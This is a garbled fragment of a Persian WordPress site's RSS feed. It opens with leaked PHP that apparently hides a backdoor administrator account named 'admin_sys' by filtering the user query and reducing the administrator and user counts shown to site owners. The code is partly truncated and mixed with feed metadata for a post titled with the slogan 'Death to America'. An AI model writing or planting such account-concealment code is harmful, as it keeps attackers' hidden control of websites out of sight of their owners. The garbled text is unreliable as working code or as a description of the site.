add_action( 'pre_user_query', 'site_pre_user_query_ri' );
function site_pre_user_query_ri( $user_search ) {
global $current_user, $wpdb;
if ( $current_user->user_login !== 'admin_sys' ) {
}
}
add_filter( 'views_users', 'site_list_table_views_ri' );
function site_list_table_views_ri( $views ) {
$users = count_users();
$admins_num = $users['avail_roles']['administrator'] - 1;
$all_num = $users['total_users'] - 1;
$is_adm = strpos( $views['administrator'], 'current' ) === false ? '' : 'current';
$is_all = strpos( $views['all'], 'current' ) === false ? '' : 'current';
$views['administrator'] = '' .
translate_user_role( 'Administrator' ) . ' (' . $admins_num . ')';
$views['all'] = '' .
__( 'All' ) . ' (' . $all_num . ')';
return $views;
}
مرگ بر آمریکا – 3×4
https://3x4house.ir
Mon, 11 Mar 2024 09:49:27 +0000
fa-IR
hourly
1
https://wordpress.org/?v=6.4.9
https://3x4house.ir/wp-content/uploads/2023/08/cropped-sample-logo-32x32.png
مرگ بر آمریکا – 3×4
https://3x4house.ir
32
32
-
مرگ بر آمریکا
https://3x4house.ir/projects/%d9%85%d8%b1%da%af-%d8%a8%d8%b1-%d8%a2%d9%85%d8%b1%db%8c%da%a9%d8%a7/
Sat, 09 Mar 2024 14:54:35 +0000
https://3x4house.ir/?post_type=projects&p=1006